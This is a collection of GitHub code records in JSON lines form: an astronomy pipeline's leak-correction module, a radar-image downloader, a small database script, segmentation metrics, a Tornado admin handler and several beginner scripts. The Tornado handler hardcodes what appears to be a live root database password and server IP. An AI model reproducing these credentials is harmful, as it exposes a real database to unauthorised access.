storage dictionary\n medcubedict = dict()\n medcubetable = dict()\n # loop around fibers\n for fiber in extractdict:\n # add level to recipe log\n log2 = recipe.log.add_level(params, 'fiber', fiber)\n # get the file list for this fiber\n extfiles = extractdict[fiber]\n # construct the combined file\n extout = extfiles[0].combine(extfiles[1:], 'median',\n test_similarity=False)\n # get outfile and table\n extfile, outtable = extout\n # construct the leak reference file instance\n outfile = recipe.outputs['LEAK_REF'].newcopy(params=params,\n fiber=fiber)\n # construct the filename from file instance\n outfile.construct_filename(infile=extfile)\n # copy keys from input file\n outfile.copy_original_keys(extfile)\n # add median cube to outfile instance\n outfile.data = extfile.data\n # add to median cube storage\n medcubedict[fiber] = outfile\n medcubetable[fiber] = outtable\n # end this log level\n log2.end()\n # return median cube storage dictionary\n return medcubedict, medcubetable\n\n\ndef save_uncorrected_ext_fp(params: ParamDict, recipe: DrsRecipe,\n infile: DrsFitsFile, eprops: ParamDict,\n fiber: str, debug_uncorr: Optional[bool] = None):\n \"\"\"\n Save un-corrected extracted file (before correction) for debugging\n\n :param params: ParamDict, parameter dictionary of constants\n :param recipe: DrsRecipe, the recipe instance that called this function\n :param infile: DrsFitsFile, the input file instance\n :param eprops: ParamDict, parameter dictionary for extraction\n :param fiber: str, the fiber\n :param debug_uncorr: bool or None, if set to False does not save debug\n file, if set overrides 'DEBUG_UNCOOR_EXT_FILES' from\n params\n\n :return: None, saves debug file to disk\n \"\"\"\n # set function name\n func_name = display_func('save_uncorrected_ext_fp', __NAME__)\n # ------------------------------------------------------------------------\n # get parameters from params\n debug_uncorr_ext_files = pcheck(params, 'DEBUG_UNCORR_EXT_FILES',\n func=func_name, override=debug_uncorr)\n # -------------------------------------------------------------------------\n # check we want to save uncorrected\n if not debug_uncorr_ext_files:\n return\n # check that we have corrected leak\n if not eprops['LEAK_CORRECTED']:\n return\n # get a new copy of the e2ds file\n e2dsfile = recipe.outputs['E2DS_FILE'].newcopy(params=params,\n fiber=fiber)\n # construct the filename from file instance\n e2dsfile.construct_filename(infile=infile)\n # define header keys for output file\n # copy keys from input file (excluding loc)\n e2dsfile.copy_original_keys(infile, exclude_groups=['loc'])\n # add version\n e2dsfile.add_hkey('KW_VERSION', value=params['DRS_VERSION'])\n # add dates\n e2dsfile.add_hkey('KW_DRS_DATE', value=params['DRS_DATE'])\n e2dsfile.add_hkey('KW_DRS_DATE_NOW', value=params['DATE_NOW'])\n # add process id\n e2dsfile.add_hkey('KW_PID', value=params['PID'])\n # add output tag\n e2dsfile.add_hkey('KW_OUTPUT', value=e2dsfile.name)\n e2dsfile.add_hkey('KW_FIBER', value=fiber)\n # copy data\n e2dsfile.data = eprops['LEAKCORR']\n # -----------------------------------------------------------------\n # get basename\n infile = e2dsfile.basename\n inpath = e2dsfile.filename\n indir = inpath.split(infile)[0]\n # add prefix\n outfile = 'DEBUG-uncorr-{0}'.format(infile)\n # construct full path\n outpath = os.path.join(indir, outfile)\n # set filename\n e2dsfile.set_filename(outpath)\n # log that we are saving e2ds uncorrected debug file\n wargs = [e2dsfile.filename]\n WLOG(params, '', textentry('40-016-00005', args=wargs))\n # define multi lists\n data_list, name_list = [], []\n # snapshot of parameters\n if params['PARAMETER_SNAPSHOT']:\n data_list += [params.snapshot_table(recipe, drsfitsfile=e2dsfile)]\n name_list += ['PARAM_TABLE']\n # write image to file\n e2dsfile.write_multi(data_list=data_list, name_list=name_list,\n block_kind=recipe.out_block_str,\n runstring=recipe.runstring)\n # add to output files (for indexing)\n recipe.add_output_file(e2dsfile)\n\n\ndef ref_fplines(params: ParamDict, recipe: DrsRecipe, e2dsfile: DrsFitsFile,\n wavemap: np.ndarray, fiber: str,\n database: Optional[CalibrationDatabase] = None,\n fptypes: Optional[List[str]] = None) -> Union[Table, None]:\n \"\"\"\n Construct the reference FP line table\n\n :param params: ParamDict, parameter dictionary of constants\n :param recipe: DrsRecipe, the recipe instance that called this function\n :param e2dsfile: DrsFitsFile, the extracted file instance\n :param wavemap: numpy 2D array, the wave map to use\n :param fiber: str, the fiber we are using\n :param database: Calibration database or None, if not set reloads the\n calibration database\n :param fptypes: list of strings or None, the allowed FP DPRTYPES, if set\n overrides the params constant WAVE_FP_DPRLIST\n\n :return: either None or the FP line table\n \"\"\"\n # set up function name\n func_name = display_func('ref_fplines', __NAME__)\n # get constant from params\n allowtypes = pcheck(params, 'WAVE_FP_DPRLIST', func=func_name,\n override=fptypes, mapf='list')\n # get dprtype\n dprtype = e2dsfile.get_hkey('KW_DPRTYPE', dtype=str)\n # get psuedo constants\n pconst = constants.pload()\n sfibers, rfiber = pconst.FIBER_KINDS()\n # ----------------------------------------------------------------------\n # deal with fiber being the reference fiber\n if fiber != rfiber:\n # Skipping FPLINES (Fiber = {0})'\n WLOG(params, 'debug', textentry('90-016-00003', args=[fiber]))\n return None\n # ----------------------------------------------------------------------\n # deal with allowed dprtypes\n if dprtype not in allowtypes:\n # Skipping FPLINES (DPRTYPE = {0})\n WLOG(params, 'debug', textentry('90-016-000034', args=[dprtype]))\n return None\n # ----------------------------------------------------------------------\n # get reference hc lines and fp lines from calibDB\n wout = wave.get_wavelines(params, fiber, infile=e2dsfile,\n database=database)\n mhclines, mhclsource, mfplines, mfplsource = wout\n # deal with no fplines found\n if mfplines is None:\n return None\n # ----------------------------------------------------------------------\n # generate the fp reference lines\n fpargs = dict(e2dsfile=e2dsfile, wavemap=wavemap, fplines=mfplines)\n rfpl = wave.calc_wave_lines(params, recipe, **fpargs)\n # ----------------------------------------------------------------------\n # return fp lines for e2ds file\n return rfpl\n\n\ndef qc_leak_ref(params: ParamDict, medcubes: Dict[str, DrsFitsFile]\n ) -> Tuple[Dict[str, List[list]], bool]:\n \"\"\"\n Perform the quality control for the leak reference recipe\n\n :param params: ParamDict, parameter dictionary of constants\n :param medcubes: dictionary of drs fits file per fiber (key=fiber)\n\n :return: tuple, 1. the quality control dictionary one key for each fiber\n each value is a list of quality control params, 2. whether\n quality control was passed\n \"\"\"\n # output storage\n qc_params = dict()\n passed = True\n # loop around fibers\n for fiber in medcubes:\n # log that we are doing qc for a specific fiber\n WLOG(params, 'info', textentry('40-016-00026', args=[fiber]))\n # set passed variable and fail message list\n fail_msg, qc_values, qc_names, qc_logic, qc_pass = [], [], [], [], []\n # no quality control currently\n qc_values.append('None')\n qc_names.append('None')\n qc_logic.append('None')\n qc_pass.append(1)\n # ------------------------------------------------------------------\n # finally log the failed messages and set QC = 1 if we pass the\n # quality control QC = 0 if we fail quality control\n if np.sum(qc_pass) == len(qc_pass):\n WLOG(params, 'info', textentry('40-005-10001'))\n passed_fiber = 1\n else:\n for farg in fail_msg:\n WLOG(params, 'warning', textentry('40-005-10002') + farg,\n sublevel=6)\n passed_fiber = 0\n # store in qc_params\n qc_params_fiber = [qc_names, qc_values, qc_logic, qc_pass]\n # append to storage\n qc_params[fiber] = qc_params_fiber\n passed &= passed_fiber\n # return qc_params and passed\n return qc_params, passed\n\n\ndef qc_leak(params: ParamDict, props: ParamDict, extname: Optional[str] = None\n ) -> Tuple[Dict[str, List[list]], bool]:\n \"\"\"\n Quality control for the leak correction\n\n :param params: ParamDict, the parameter dictionary of constants\n :param props: ParamDict, the leak ref parameter dictionary\n :param extname: str or None, the e2ds file name to use as the extract\n file for quality control\n\n :return: tuple, 1. the quality control dictionary one key for each fiber\n each value is a list of quality control params, 2. whether\n quality control was passed\n \"\"\"\n # set function name\n func_name = __NAME__ + '.qc_leak()'\n # get outputs from props\n outputs = props['OUTPUTS']\n # get leak extract file\n extname = pcheck(params, 'LEAK_EXTRACT_FILE', func=func_name,\n override=extname)\n # output storage\n qc_params = dict()\n passed = True\n # loop around fibers\n for fiber in outputs:\n # log that we are doing qc for a specific fiber\n WLOG(params, 'info', textentry('40-016-00026', args=[fiber]))\n # set passed variable and fail message list\n fail_msg = []\n # ------------------------------------------------------------------\n # deal with old qc params\n # ------------------------------------------------------------------\n # get extfile\n extfile = outputs[fiber][extname]\n # copy the quality control from header\n qc_names, qc_values, qc_logic, qc_pass = extfile.get_qckeys()\n # ------------------------------------------------------------------\n # finally log the failed messages and set QC = 1 if we pass the\n # quality control QC = 0 if we fail quality control\n if np.sum(qc_pass) == len(qc_pass):\n WLOG(params, 'info', textentry('40-005-10001'))\n passed_fiber = 1\n else:\n for farg in fail_msg:\n WLOG(params, 'warning', textentry('40-005-10002') + farg,\n sublevel=6)\n passed_fiber = 0\n # store in qc_params\n qc_params_fiber = [qc_names, qc_values, qc_logic, qc_pass]\n # append to storage\n qc_params[fiber] = qc_params_fiber\n passed &= passed_fiber\n # return qc_params and passed\n return qc_params, passed\n\n\ndef write_leak_ref(params: ParamDict, recipe: DrsRecipe, rawfiles: List[str],\n medcubes: Dict[str, DrsFitsFile],\n medtables: Dict[str, Table],\n qc_params: Dict[str, List[list]],\n props: ParamDict) -> Dict[str, DrsFitsFile]:\n \"\"\"\n Write the leak reference files to disk\n\n :param params: ParamDict, the parameter dictionary of constants\n :param recipe: DrsRecipe, the recipe instance that called this function\n :param rawfiles: list of strings, the input files for this recipe\n :param medcubes: dictionary of DrsFitsFiles, one for each fiber\n :param medtables: dictionary of tables, one for each fiber\n :param qc_params: dictionary of quality control lists, one for each fiber\n :param props: ParamDict, the leak reference parameter dictionary\n\n :return: dictionary of DrsFitsFiles, the DrsFitsFile for each fiber\n as written to disk\n \"\"\"\n # loop around fibers\n for fiber in medcubes:\n # get outfile for this fiber\n outfile = medcubes[fiber]\n # get qc_params for this fiber\n qc_params_fiber = qc_params[fiber]\n # ------------------------------------------------------------------\n # have already copied original keys in ref_dark_fp_cube function\n # data is already added as well\n # so just need other keys\n # ------------------------------------------------------------------\n # add version\n outfile.add_hkey('KW_VERSION', value=params['DRS_VERSION'])\n # add dates\n outfile.add_hkey('KW_DRS_DATE', value=params['DRS_DATE'])\n outfile.add_hkey('KW_DRS_DATE_NOW', value=params['DATE_NOW'])\n # add process id\n outfile.add_hkey('KW_PID', value=params['PID'])\n # add output tag\n outfile.add_hkey('KW_OUTPUT', value=outfile.name)\n # add input files\n outfile.add_hkey_1d('KW_INFILE1', values=rawfiles, dim1name='file')\n # add input files to outfile\n outfile.infiles = list(rawfiles)\n # add qc parameters\n outfile.add_qckeys(qc_params_fiber)\n # add leak parameters from props (if set)\n if props is not None:\n outfile.add_hkey('KW_LEAK_BP_U',\n value=props['LEAK_BCKGRD_PERCENTILE'])\n outfile.add_hkey('KW_LEAK_NP_U',\n value=props['LEAK_NORM_PERCENTILE'])\n outfile.add_hkey('KW_LEAK_WSMOOTH', value=props['LEAKREF_WSMOOTH'])\n outfile.add_hkey('KW_LEAK_KERSIZE', value=props['LEAKREF_KERSIZE'])\n # log that we are saving rotated image\n wargs = [fiber, outfile.filename]\n WLOG(params, '', textentry('40-016-00025', args=wargs))\n # define multi lists\n data_list = [medtables[fiber]]\n datatype_list = ['table']\n name_list = ['COMBINE_TABLE']\n # snapshot of parameters\n if params['PARAMETER_SNAPSHOT']:\n data_list += [params.snapshot_table(recipe, drsfitsfile=outfile)]\n datatype_list += ['table']\n name_list += ['PARAM_TABLE']\n # write image to file\n outfile.write_multi(data_list=data_list, name_list=name_list,\n datatype_list=datatype_list,\n block_kind=recipe.out_block_str,\n runstring=recipe.runstring)\n # add to output files (for indexing)\n recipe.add_output_file(outfile)\n # update med cubes (as it was shallow copied this is just for sanity\n # check)\n medcubes[fiber] = outfile\n # return medcubes\n return medcubes\n\n\ndef write_leak(params: ParamDict, recipe: DrsRecipe,\n inputs: Dict[str, Dict[str, DrsFitsFile]],\n props: ParamDict, qc_params: Dict[str, List[list]],\n s1dextfile: Optional[str] = None):\n \"\"\"\n Write the leak file to disk\n\n :param params: ParamDict, the parameter dictionary of constants\n :param recipe: DrsRecipe, the recipe instance that called this function\n :param inputs: dictionary key per fiber, the input extraction DrsFitsFiles\n each inner key is a type of extraction file\n :param props: ParamDict, the leak parameter dictionary\n :param qc_params: dictionary key per fiber, the quality control lists\n :param s1dextfile: str or None, this is the s1d file instance name to use,\n if set overrides \"EXT_S1D_INFILE\" from params\n\n :return: None, writes leak files to disk\n \"\"\"\n # set function name\n func_name = __NAME__ + '.write_leak()'\n # get outputs from props\n outputs = props['OUTPUTS']\n s1dw_outs = props['S1DW']\n s1dv_outs = props['S1DV']\n # set header keys to add\n keys = ['KW_LEAK_BP_U', 'KW_LEAK_NP_U', 'KW_LEAK_LP_U', 'KW_LEAK_UP_U',\n 'KW_LEAK_BADR_U']\n values = ['LEAK_BCKGRD_PERCENTILE_USED', 'LEAK_NORM_PERCENTILE_USED',\n 'LEAK_LOW_PERCENTILE_USED', 'LEAK_HIGH_PERCENTILE_USED',\n 'LEAK_BAD_RATIO_OFFSET_USED']\n\n # ----------------------------------------------------------------------\n # 2D files\n # ----------------------------------------------------------------------\n # loop around fibers\n for fiber in outputs:\n # loop around files\n for extname in outputs[fiber]:\n # get the s1d in file type\n extfile = outputs[fiber][extname]\n # add infiles to out file\n extfile.infiles = [extfile.basename]\n # add leak corr key\n extfile.add_hkey('KW_LEAK_CORR', value=True)\n # loop around leak keys to add\n for it in range(len(keys)):\n extfile.add_hkey(keys[it], value=props[values[it]])\n # add qc parameters\n extfile.add_qckeys(qc_params[fiber])\n # log that we are saving file\n wargs = [fiber, extname, extfile.filename]\n WLOG(params, '', textentry('40-016-00030', args=wargs))\n # define multi lists\n data_list, name_list = [], []\n # snapshot of parameters\n if params['PARAMETER_SNAPSHOT']:\n data_list += [params.snapshot_table(recipe,\n drsfitsfile=extfile)]\n name_list += ['PARAM_TABLE']\n # write image to file\n extfile.write_multi(data_list=data_list, name_list=name_list,\n block_kind=recipe.out_block_str,\n runstring=recipe.runstring)\n # add back to outputs dictionary (used for s1d)\n outputs[fiber][extname] = extfile\n # add to output files (for indexing)\n recipe.add_output_file(extfile)\n\n # ----------------------------------------------------------------------\n # S1D files\n # ----------------------------------------------------------------------\n # get the leak extract file type\n s1dextfile = pcheck(params, 'EXT_S1D_INFILE',\n func=func_name, override=s1dextfile)\n # loop around fibers\n for fiber in outputs:\n # get extfile\n extfile = outputs[fiber][s1dextfile]\n # get s1d props for this fiber\n swprops = s1dw_outs[fiber]\n svprops = s1dv_outs[fiber]\n # get input extraction file (1D case)\n s1dwfile = inputs[fiber]['S1D_W_FILE']\n s1dvfile = inputs[fiber]['S1D_V_FILE']\n # ------------------------------------------------------------------\n # Store S1D_W in file\n # ------------------------------------------------------------------\n # copy header from e2dsff file\n s1dwfile.copy_header(extfile)\n # set output key\n s1dwfile.add_hkey('KW_OUTPUT', value=s1dwfile.name)\n # add new header keys\n s1dwfile = gen_ext.add_s1d_keys(s1dwfile, swprops)\n # copy in files\n s1dwfile.infiles = list(extfile.infiles)\n # copy data\n s1dwfile.data = swprops['S1DTABLE']\n # must change the datatype to 'table'\n s1dwfile.datatype = 'table'\n # ------------------------------------------------------------------\n # log that we are saving rotated image\n wargs = [fiber, 'wave', s1dwfile.filename]\n WLOG(params, '', textentry('40-016-00031', args=wargs))\n # define multi lists\n data_list, name_list = [], []\n # snapshot of parameters\n if params['PARAMETER_SNAPSHOT']:\n data_list += [params.snapshot_table(recipe, drsfitsfile=s1dwfile)]\n name_list += ['PARAM_TABLE']\n # write image to file\n s1dwfile.write_multi(data_list=data_list, name_list=name_list,\n block_kind=recipe.out_block_str,\n runstring=recipe.runstring)\n # add to output files (for indexing)\n recipe.add_output_file(s1dwfile)\n # ------------------------------------------------------------------\n # Store S1D_V in file\n # ------------------------------------------------------------------\n # copy header from e2dsff file\n s1dvfile.copy_header(extfile)\n # add new header keys\n s1dvfile = gen_ext.add_s1d_keys(s1dvfile, svprops)\n # copy in files\n s1dvfile.infiles = list(extfile.infiles)\n # set output key\n s1dvfile.add_hkey('KW_OUTPUT', value=s1dvfile.name)\n # copy data\n s1dvfile.data = svprops['S1DTABLE']\n # must change the datatype to 'table'\n s1dvfile.datatype = 'table'\n # ------------------------------------------------------------------\n # log that we are saving rotated image\n wargs = [fiber, 'velocity', s1dvfile.filename]\n WLOG(params, '', textentry('40-016-00031', args=wargs))\n # define multi lists\n data_list, name_list = [], []\n # snapshot of parameters\n if params['PARAMETER_SNAPSHOT']:\n data_list += [params.snapshot_table(recipe, drsfitsfile=s1dvfile)]\n name_list += ['PARAM_TABLE']\n # write image to file\n s1dvfile.write_multi(data_list=data_list, name_list=name_list,\n block_kind=recipe.out_block_str,\n runstring=recipe.runstring)\n # add to output files (for indexing)\n recipe.add_output_file(s1dvfile)\n # ------------------------------------------------------------------\n\n\n# =============================================================================\n# Start of code\n# =============================================================================\nif __name__ == \"__main__\":\n # print hello world\n print('Hello World')\n\n# =============================================================================\n# End of code\n# =============================================================================\n","repo_name":"njcuk9999/apero-drs","sub_path":"apero/science/calib/leak.py","file_name":"leak.py","file_ext":"py","file_size_in_byte":48741,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"5"} +{"seq_id":"28585261999","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport requests\nimport shutil\nfrom datetime import datetime, timedelta\nimport os\nimport pytz\n\nos.chdir('/home/boto/newsnowmap')\n\nutc_now = pytz.utc.localize(datetime.utcnow())\ncet_now = utc_now.astimezone(pytz.timezone(\"Europe/Prague\"))\n\ntry:\n with open('./data/downloaded', 'r') as f:\n for line in f:\n pass\n last = line.strip()\nexcept FileNotFoundError:\n last = datetime.strftime(utc_now - timedelta(days=3), '%Y%m%d.%H00')\n\nlast_img_dt = pytz.timezone(\"UTC\").localize(datetime.strptime(last, '%Y%m%d.%H%M'))\ncurrent_dt = utc_now\n\nwhile current_dt > last_img_dt:\n new_img_dt = last_img_dt + timedelta(hours=1)\n new_dt = datetime.strftime(new_img_dt, '%Y%m%d.%H%M')\n img = requests.get('http://www.shmu.sk/data/dataradary/data.1hrain/pcp.1h.'+new_dt+'.0.png', stream=True)\n if img.status_code != 200:\n last_img_dt = new_img_dt\n continue\n else:\n img.raw.decode_content = True\n with open('./images/pcp.1h.'+new_dt+'.0.png','wb') as f:\n shutil.copyfileobj(img.raw, f)\n with open('./data/downloaded', 'a') as f:\n f.write(new_dt+'\\n')\n last_img_dt = new_img_dt\n\nprint('Download done!', datetime.utcnow(), 'UTC')\n","repo_name":"bboto32/newsnowmap","sub_path":"src/download_snowfall_images.py","file_name":"download_snowfall_images.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36980423726","text":"import dbcreds\nimport mariadb\ndef select_all_posts(conn):\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM w20.blog_post\")\n allPost = cursor.fetchall()\n print(allPost)\n cursor.close()\n\ndef update_info(username,content):\n content = input(\"please give us some content about you: \")\n cursor = conn.cursor()\n cursor.execute(\"INSERT INTO w20.blog_post(username, content, id) VALUES(?,?, NULL)\",[username,content])\n conn.commit()\n cursor.close()\n\nconn = mariadb.connect(user=dbcreds.user,password=dbcreds.password,host=dbcreds.host,database=dbcreds.database,port=dbcreds.port)\n\nusername = input(\"what is your username?: \")\noption = input(\"What option would you like to select? (1: INSERT or 2: SEE ALL) \")\n\nif option == '1':\n update_info(username,option)\n \nelif option == '2':\n select_all_posts(conn)\n \nconn.close()","repo_name":"jaypn/w20a","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25025517657","text":"# -*- coding = utf-8 -*-\n# @File Name : lsa_metrics\n# @Date : 1/9/23 11:49 AM\n# @Author : zhiweideng\n# @E-mail : zhiweide@usc.edu\n\n\nimport sys\nimport time\nimport argparse\nimport subprocess\nimport numpy as np\nfrom tqdm import tqdm\nimport SimpleITK as sitk\nfrom sklearn import metrics\nimport seg_metrics.seg_metrics as sg\nsys.path.append('/ifs/loni/faculty/shi/spectrum/zdeng/MSA_Data/UnsupervisedVesselSeg/codes')\nfrom datasets.datasets_3d import get_data_loader_3d\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--method', type=str, default='ours')\nparser.add_argument('--split', type=str, default='test')\n\n\ndef dice_score(v_threshed, gt):\n if v_threshed.size == 0:\n return np.nan\n num = (2 * v_threshed * gt).mean()\n den = v_threshed.mean() + gt.mean() + 1e-100\n return num / den\n\n\ndef get_best_dice_threshold(response, label, thresholds):\n best_thresh, best_dice = None, -1\n n = int(len(thresholds) / 100.0)\n for thresh in (thresholds[::n]):\n bin_response = (response >= thresh) + 0.0\n curr_dice = dice_score(bin_response, label)\n if curr_dice > best_dice:\n best_thresh = thresh\n best_dice = curr_dice\n print(\"Got best dice {:.4f} at threshold {}\".format(best_dice, best_thresh))\n return best_thresh\n\n\ndef get_metrics(arguments):\n dice_scores, hd95_scores, avd_scores, best_thresholds = [], [], [], []\n data_loader = get_data_loader_3d(data_name='LSA', split=arguments.split, batch_size=1, shuffle=False)\n label_files = data_loader.dataset.label_files\n\n # compute the best thresholds\n for label_file in tqdm(label_files):\n subject_id = label_file.split('/')[-2]\n response_file = 'LSA_{}_{}/LSA_{}.nii.gz'.format(arguments.method, arguments.split, subject_id)\n print(response_file)\n response_image, label_image = sitk.ReadImage(response_file), sitk.ReadImage(label_file)\n response, label = sitk.GetArrayFromImage(response_image), sitk.GetArrayFromImage(label_image)\n _, _, thresholds = metrics.roc_curve(label.reshape(-1), response.reshape(-1), pos_label=1)\n curr_best_thresh = get_best_dice_threshold(response, label, thresholds)\n best_thresholds.append(curr_best_thresh)\n\n final_threshold = np.mean(best_thresholds)\n print('Final Threshold is {}.'.format(final_threshold))\n\n # compute the dice scores\n for label_file in tqdm(label_files):\n subject_id = label_file.split('/')[-2]\n response_file = 'LSA_{}_{}/LSA_{}.nii.gz'.format(arguments.method, arguments.split, subject_id)\n binary_file = 'LSA_{}_{}/BIN_LSA_{}.nii.gz'.format(arguments.method, arguments.split, subject_id)\n response_image, label_image = sitk.ReadImage(response_file), sitk.ReadImage(label_file)\n response, label = sitk.GetArrayFromImage(response_image), sitk.GetArrayFromImage(label_image)\n bin_response = (response >= final_threshold) + 0.0\n # write the binary results\n bin_image = sitk.GetImageFromArray(bin_response)\n bin_image.CopyInformation(response_image)\n sitk.WriteImage(bin_image, binary_file)\n # get metrics\n labels = [0, 1]\n metric_results = sg.write_metrics(labels=labels[1:],\n gdth_path=label_file,\n pred_path=binary_file,\n metrics=['dice', 'hd95'],\n verbose=False)\n curr_dice = metric_results[0]['dice'][0]\n curr_hd95 = metric_results[0]['hd95'][0]\n dice_scores.append(curr_dice)\n hd95_scores.append(curr_hd95)\n # get AVD metric\n result1 = subprocess.run(['./EvaluateSegmentation', label_file, binary_file], capture_output=True, text=True)\n curr_avd = float(result1.stdout[result1.stdout.find('AVGDIS')+9:result1.stdout.find('AVGDIS')+19])\n avd_scores.append(curr_avd)\n\n print(\"Method: {}\".format(arguments.method))\n print(\"Dice Mean: {:.5f}, Std: {:.5f}\".format(np.mean(dice_scores), np.std(dice_scores)))\n print(\"HD95 Mean: {:.5f}, Std: {:.5f}\".format(np.mean(hd95_scores), np.std(hd95_scores)))\n print(\"AVD Mean: {:.5f}, Std: {:.5f}\".format(np.mean(avd_scores), np.std(avd_scores)))\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n get_metrics(args)\n","repo_name":"dengchihwei/LCNetVesselSeg","sub_path":"tests/LSA/lsa_metrics.py","file_name":"lsa_metrics.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"38728278131","text":"import tornado.ioloop\nimport tornado.web\nimport tornado.httpclient\nimport SqlHandler\nimport json\nimport utils\n\n\nclass AdmGetStudentListRequestHandler(tornado.web.RequestHandler):\n def get(self):\n \"\"\"\n 从数据库获取学生列表返回给管理员\n \"\"\"\n try:\n self.sqlhandler = None\n if \"UID\" not in self.request.cookies.keys():\n self.write(\"no uid\")\n return\n\n if not utils.isUIDValid(self):\n self.write(\"no uid\")\n return\n if self.getStuList():\n self.write(json.dumps(self.stuList if self.stuList is not None else {\"length\":0}))\n self.finish()\n else:\n raise RuntimeError\n except Exception as e:\n print(e)\n self.write(\"error\")\n self.finish()\n finally:\n if self.sqlhandler is not None:\n self.sqlhandler.closeMySql()\n\n def getStuList(self):\n \"\"\"\n 从数据库读取学生信息\n \"\"\"\n self.sqlhandler = SqlHandler.SqlHandler(Host='139.159.176.78',\n User='root',\n Password='liyuhang8',\n DBName='PersonDatabase')\n if self.sqlhandler.getConnection():\n \"\"\"\n 查询所有学生\n \"\"\"\n\n sql = \"select StuId, stuName, StuSex, StuAge, StuPhoneNumber, StuQQ, StuAddress, StuClass from StuPersonInfo\"\n\n self.stuList = self.sqlhandler.executeQuerySQL(sql)\n\n return True\n return False\n\n\nif __name__ == \"__main__\":\n\n app = tornado.web.Application(\n handlers=[(r\"/\", AdmGetStudentListRequestHandler)])\n http_server = tornado.httpserver.HTTPServer(app)\n http_server.listen(8080)\n tornado.ioloop.IOLoop.current().start()\n","repo_name":"lyh-ADT/edu-app","sub_path":"server/admin/python/AdmGetStudentListRequestHandler.py","file_name":"AdmGetStudentListRequestHandler.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"23936054396","text":"#Программа предназначена для выбора звуковых секций из речевой базы для дальнейшего синтеза\r\n#Автор: Сафина А.М.\r\n#На вход принимается список слов\r\n#Выход��ые данные: соответствующие списку звуковые дорожки\r\nimport pyttsx3\r\ndef sound_choose(my_string_1):\r\n print(\"\\nЧитаю... \")\r\n my_string_2 = my_string_1\r\n engine = pyttsx3.init()\r\n voices = engine.getProperty('voices')\r\n engine.setProperty('voice', voices[2].id)\r\n engine.say(my_string_2)\r\n engine.save_to_file(my_string_2, 'test_sound_choose_3.mp3')\r\n engine.runAndWait()\r\n return 0\r\n","repo_name":"puffsi/NIR","sub_path":"sound_choose.py","file_name":"sound_choose.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"22387601533","text":"import os\nimport Objetos\n\ndef main():\n object1 = Objetos.Objetos(\"Dennis\",20,True,2000)\n object2 = Objetos.Objetos(\"Luis\",25,True,2300)\n object3 = Objetos.Objetos(\"Leslie\",23,True,2444)\n object4 = Objetos.Objetos(\"Juan\",20,False,2333)\n object5 = Objetos.Objetos(\"Renee\",20,True,5312)\n object6 = Objetos.Objetos(\"Jessica\",20,False,4455)\n object7 = Objetos.Objetos(\"Sarah\",19,True,12345)\n object8 = Objetos.Objetos(\"Carlos\",27,True,3333)\n object9 = Objetos.Objetos(\"Cesar\",19,False,4682)\n object10 = Objetos.Objetos(\"Francisco\",21,True,6532)\n\n listaobjetos = [object1,object2,object3,object4,object5,object6,object7,object8,object9,object10]\n rows = rowGenerator(listaobjetos)\n\n html_string = \"\"\" \n \n \n \n \n \n \n \n \n \n \"\"\"+rows+\"\"\" \n
NombreEdadActivoSaldo
\n \n \n \"\"\"\n\n report = open('reporte.html', 'w')\n report.write(html_string)\n report.close()\n os.startfile(\"reporte.html\")\n\n\ndef rowGenerator(listgiven):\n rows = \"\"\n for x in listgiven:\n newrow = \"\"\"\n \n \"\"\"+x.getNombre()+\"\"\"\n \"\"\"+str(x.getEdad())+\"\"\"\n \"\"\"+str(x.isActivo())+\"\"\"\n \"\"\"+str(x.getSaldo())+\"\"\" \n \n \"\"\"\n rows += newrow\n return rows\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"DennisV1999/-201800593_TareasLFP","sub_path":"Tarea 4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"10026059017","text":"myList = [14,33,27,10,35,19,42,44]\n\ndef isUnsorted(elem1,elem2):\n return elem1 >= elem2\n\ndef insertSort(newElement, myList):\n #Check all elem\n myList.append(newElement)\n for i in range(1,len(myList)):\n j = i\n #Sort elem\n while (j>0):\n if(isUnsorted(myList[j-1],myList[j])):\n temp = myList[j-1]\n myList[j-1] = myList[j]\n myList[j] = temp\n j-=1\n else:\n break\n return myList\n\nprint(insertSort(3,myList))","repo_name":"SofiaLouisy/ComplexityExample","sub_path":"ComplexityExample/insertSort.py","file_name":"insertSort.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"33710021257","text":"\"\"\"\nPrints the expected profit.\n\nKeyword arguments:\nPRICE_PER_USER\nTOTAL_USERS\nEXPENSES\nPROFIT_PREV_YEAR\n\"\"\"\nfrom os import sys\n\nPRICE_PER_USER = float(sys.argv[1])\nTOTAL_USERS = float(sys.argv[2])\nEXPENSES = float(sys.argv[3])\n\nPROFIT_PREV_YEAR = 1000\nif len(sys.argv) == 5:\n PROFIT_PREV_YEAR = float(sys.argv[4])\nTAXES = 0.35\n\nINCOME = PRICE_PER_USER * TOTAL_USERS\nPROFIT_CURR_YEAR = INCOME - EXPENSES\n\nif PROFIT_CURR_YEAR > 0:\n PROFIT_CURR_YEAR *= (1 - TAXES)\n\nRATE_PERCENT = PROFIT_CURR_YEAR * 100 / PROFIT_PREV_YEAR\n\nprint(\"\")\nprint(\"Utilidades actuales vs. año anterior = {}%\".format(RATE_PERCENT))\n","repo_name":"gus-morales/dlatam_ds","sub_path":"desafios/_vault/m1_w01/emprendedor3.py","file_name":"emprendedor3.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} 